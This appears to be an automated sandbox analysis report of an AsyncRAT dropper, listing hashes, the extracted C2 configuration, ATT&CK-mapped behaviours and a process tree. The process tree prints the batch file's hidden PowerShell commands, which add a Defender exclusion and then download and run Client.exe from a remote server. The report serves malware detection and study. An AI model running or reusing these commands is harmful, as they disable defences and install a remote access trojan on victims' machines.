asyncrat | 35e4cca77e38bd9beaf4a33c97a6f2464ca5ff63bbcf59831bd829b4683fda3c

max time kernel
236s
max time network
231s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
23/08/2024, 11:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http45.151.62.96setup.exe.txt
Size

29B
MD5

688fe12c2f39d3d739a04e6c89b1b22f
SHA1

e2ea25ad47861e77b912026839666d3a99f5c90b
SHA256

35e4cca77e38bd9beaf4a33c97a6f2464ca5ff63bbcf59831bd829b4683fda3c
SHA512

f56694118d4adee2e0c65fb28c3ef86bc5db032656e2306e02e0f5b19706e260f0505ee97f5068d07ae5149a410a15eccd3ebc758d216a5549d7dc0de52834ac

Score

10^/10

asyncrat default defense_evasion execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://20.199.84.103/Client.exe

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

127.0.0.1:1024

20.199.84.103:1024

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000b00000001ac36-204.dat	family_asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
35	3452	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5060	powershell.exe
3452	powershell.exe
5060	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
3260	Client.exe
3620	Client.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File created	C:\Users\Admin\Downloads\Client.exe:Zone.Identifier	firefox.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	firefox.exe

NTFS ADS 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\sasa.bat:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Client.exe:Zone.Identifier	firefox.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
4284	NOTEPAD.EXE
3656	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
3452	powershell.exe
3452	powershell.exe
3452	powershell.exe
3452	powershell.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeDebugPrivilege	3452	powershell.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	2912	taskmgr.exe
Token: SeSystemProfilePrivilege	2912	taskmgr.exe
Token: SeCreateGlobalPrivilege	2912	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe
2912	taskmgr.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2492 wrote to memory of 4956	2492	firefox.exe	75
PID 2492 wrote to memory of 4956	2492	firefox.exe	75
PID 2492 wrote to memory of 4956	2492	firefox.exe	75
PID 2492 wrote to memory of 4956	2492	firefox.exe	75
PID 2492 wrote to memory of 4956	2492	firefox.exe	75
PID 2492 wrote to memory of 4956	2492	firefox.exe	75
PID 2492 wrote to memory of 4956	2492	firefox.exe	75
PID 2492 wrote to memory of 4956	2492	firefox.exe	75
PID 2492 wrote to memory of 4956	2492	firefox.exe	75
PID 2492 wrote to memory of 4956	2492	firefox.exe	75
PID 2492 wrote to memory of 4956	2492	firefox.exe	75
PID 4956 wrote to memory of 1988	4956	firefox.exe	76
PID 4956 wrote to memory of 1988	4956	firefox.exe	76
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 1752	4956	firefox.exe	77
PID 4956 wrote to memory of 4464	4956	firefox.exe	78
PID 4956 wrote to memory of 4464	4956	firefox.exe	78
PID 4956 wrote to memory of 4464	4956	firefox.exe	78

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\http45.151.62.96setup.exe.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:4284

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2492
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4956
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.0.1721342013\135553432" -parentBuildID 20221007134813 -prefsHandle 1732 -prefMapHandle 1724 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf7cd14c-e355-4fe7-b6aa-e30915027c86} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 1812 13607bd6b58 gpu
    3⤵
    PID:1988
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.1.369153420\1015226319" -parentBuildID 20221007134813 -prefsHandle 2156 -prefMapHandle 2152 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1eed427a-c9e4-444f-8d76-bde994e91a3c} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 2168 13607afb058 socket
    3⤵
    PID:1752
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.2.1148693493\280691371" -childID 1 -isForBrowser -prefsHandle 2716 -prefMapHandle 2596 -prefsLen 20866 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4384472b-3743-4e14-8a28-e2e182d6bc6d} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 2608 1367576c458 tab
    3⤵
    PID:4464
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.3.2050051103\470484388" -childID 2 -isForBrowser -prefsHandle 3412 -prefMapHandle 3408 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b22c5200-c7de-4c44-bb29-4e5022efa682} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 3420 1360c4dff58 tab
    3⤵
    PID:3344
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.4.970085733\65548813" -childID 3 -isForBrowser -prefsHandle 4428 -prefMapHandle 4424 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5ab3aa9-41d8-496f-ac2c-25a08d756886} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 3980 13675768158 tab
    3⤵
    PID:764
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.5.999687310\370089879" -childID 4 -isForBrowser -prefsHandle 4776 -prefMapHandle 4116 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8623149b-4149-4dea-b803-175bad551488} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 4772 1360cda6e58 tab
    3⤵
    PID:432
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.6.1185793170\757794375" -childID 5 -isForBrowser -prefsHandle 4940 -prefMapHandle 4944 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5d81152-b851-445f-a314-e40de1b84a2a} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 4932 1360e3fcf58 tab
    3⤵
    PID:1092
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.7.663880019\2042934313" -childID 6 -isForBrowser -prefsHandle 5128 -prefMapHandle 5132 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2776d79b-c71f-4df5-966e-8233b8ed4910} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 4808 1360e3fde58 tab
    3⤵
    PID:4580
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.8.1694580662\1483123054" -childID 7 -isForBrowser -prefsHandle 5492 -prefMapHandle 5488 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2891e2e0-0bcb-49fa-aa6b-a9be765746fd} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5496 1360f793658 tab
    3⤵
    PID:4752
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.9.175355824\355023358" -childID 8 -isForBrowser -prefsHandle 4804 -prefMapHandle 5164 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6f003bf-3174-485e-8b4a-a3fd1f63ec68} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 4908 1360ae9f458 tab
    3⤵
    PID:4992

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\sasa.bat" "
1⤵
PID:2148
- C:\Windows\system32\fsutil.exe
  fsutil dirty query C:
  2⤵
  PID:4600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w hidden -c Add-MpPreference -ExclusionPath "C:\Windows\Temp\"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w hidden -c "(New-Object System.Net.WebClient).DownloadFile('http://20.199.84.103/Client.exe', 'C:\Windows\Temp\Client.exe')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3452
- C:\Windows\Temp\Client.exe
  "C:\Windows\Temp\Client.exe"
  2⤵
  - Executes dropped EXE
  PID:3260

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
1⤵
PID:4452

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\sasa.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:3656

C:\Users\Admin\Downloads\Client.exe
"C:\Users\Admin\Downloads\Client.exe"
1⤵
- Executes dropped EXE
PID:3620

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2912

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1cfe572f8a58e5c315192b2262b19389

SHA1
0ee01be5ceb2f4c1769d1461a33900abb85879ea

SHA256
a166e551d09fc5f77e4ede547e3dc521b71f4b5c07b93f16de2b0f976fed6751

SHA512
7820fe3c45dd79a37c31d4a5a03a167b254f0e2eb5b9acf374944ffbebc3e2c919d494cdfcbf7d4d9e8142dac21d1c0e1c7e56fbfe337e8336e5302d88bcaa2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f666b8e10b2b1430dc068c2e8d9d8d6e

SHA1
98a913933261bf003cd82fa3684915f33bd3963f

SHA256
69683b5546b838d5777ee92ebc8645c460c6bbf8da785e9050af83e2d3b9ddfb

SHA512
e252b596f8cc84a073aa20206240e6fabf321bb0ef8113c3292716c99f5f30139bcd42aa689be967bae7ed614586155be16e8515094334ed15162125b0006517

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_02ifd2xz.5vs.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\datareporting\glean\db\data.safe.bin

Filesize
2KB

MD5
a5f7ead38db0b6a04d7dc2e68d69b196

SHA1
cb3fc9eebc1eb62a2719b9a7546e1da13b7f92d4

SHA256
e5634b6b9bc29959f8d26e38f3297bacb8e936007645528107b5bcc4cab2f577

SHA512
aee4c8a74a08d3109d6a8297e4b3ce71eb3acfad9d376496c3628e18b66de0b06985c18ac0838ceb5d8b1ef784b56d824010dd45f356aba91bc8fc9f021f758a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\datareporting\glean\pending_pings\6c42ef7d-d791-456b-a551-dd7876243db5

Filesize
10KB

MD5
60009f3d16b893f75567b1589c74bd06

SHA1
27d6af256d2fd9ab7474e17d8c55ea418b1890b0

SHA256
3bd3c70d4a77bf7126ec4be0383a5ae1539c50810809393d2496ad987d2a8edd

SHA512
493b4ee876925f13bf94df3c2e9aaaf8a203c3bd8ea8ab8344ba0850438681ebb0687aafe3b398c46f44eb9291a1579e50d74be8e9a7aa3d5226c587eabd7620

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\datareporting\glean\pending_pings\994c13cf-961d-4251-88da-6a2f040cf30d

Filesize
746B

MD5
702dae46046f235698e7f7b7c11ba124

SHA1
f7aebc45199cd8c83484b2cd426fd13ab8f8fd29

SHA256
530fc076c39ca29827a8ef2b9c64f95093e2145ddbf08edc20ac16d0c2acefdd

SHA512
d000e1d3852f08646b3710caf591998c2bf6aa358a4336be0aae5ebda548bf5a611f0603c5a581d97b149d23fa0981076090f57cc54f707eb0feae8c84f962a2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\prefs-1.js

Filesize
6KB

MD5
3c8de2d84fa41dc978083ce28493b051

SHA1
89b69dacd118e86dae9dd93d5668a5b57b86a711

SHA256
b3ccaea410d52c93f1b98bb8412578248c083e1ed87e9f901ab85fa6ca6dbb26

SHA512
abc1f1b34b355cb3dfd10d4551b5d403e9bd21823ede130a374554930932859be73b2978402466ea73676c040776af4e58445d861c15390bd5a8507a912ccd70

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
7e7d3dce86c05930c362f6e5dafb7f2c

SHA1
8ed8b012f5b39b28c2f373d0e92aaa0fb2ae8b04

SHA256
c43edf5e4f73409db4dffae8cc248b0802f42b50bd7cb71686856aceb114678d

SHA512
efc9b795278a0fe0801edcc88715ef6b37d46da90a46573267eef91338b078cf4f6e840a6ba205de1ba3688ba4194a47830a47c5d856b24649c9fde90538236e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
bbb8c345be3545a3d73039d553c430b9

SHA1
5477ca117001825fefdc9c755158d6ffd89becb7

SHA256
c3b320438d75ff035e34a88cecd3718950099f5487bd7ddfd5e892c1621611c7

SHA512
a223d8870083b8fc09b34edc3b2f1b1c1bef96e8976a446cc9bb9f5d27468c7271f17c6c9822490d7b4afed3a4620197cc65a631570476036b4f3eadb100bcde

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
26c53eb41fe10eca8c7b51aa61e1e545

SHA1
aa56f6e103e075811847e9e74d6149da29e2623b

SHA256
75e2790e46d8a4ec8437d3e46f320df4ab07f11088e1450f6f50fbece29b2b58

SHA512
066507821625370ae0b86adbccbd84fd28bb58853d0e493dad707735156e2c1ec820dc7bf468515678bcb4767cc89cda076795e3c2081c7aa1a49a450c4edf6d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
baa1c1267a9d3ead6d7ce13e71b11462

SHA1
654ca0f18b2dd6ca36628daeb315bd2f40d7b457

SHA256
7f29600609e65950eee5b8cc92c2d9f89435b4fc63e93e23b9fd8ef588944236

SHA512
2d50980ce0f3552d6d5fbb45489d1d6b730235f76e1ee18639880ed4deb6168c5ea27b0cffaef0e3610a5f423cf2af7ae738206337fd6e86869dd495bb944518

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\c5nsco79.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
184KB

MD5
0ed2663971e8051b2bcb574926400fa8

SHA1
467756bf41c377bdb07c8be10d5391f1df1d80a7

SHA256
0c44c9887ebd30506041e4f483422673660df0b74c7468b0cab2c69bee1f4e8c

SHA512
e521f02d0a4dc70e3bb33747c5113c76f18f15b4370826ef13700c4f559c8b158ed1d8ef79d7d88794bfea61496a75d653237391f2f8b5e53d8574a21f113898

Download Submit
C:\Users\Admin\Downloads\7dEG1hD5.bat.part

Filesize
7KB

MD5
90c3dfd74d6ab4b7b98777930ab44a23

SHA1
7f536fa9c3972c4416e8620335e39f9e93092103

SHA256
6308f3eef2d45148c4544a0c31d5bb73f28dac4b6fcb854e003e2caa0c39d26f

SHA512
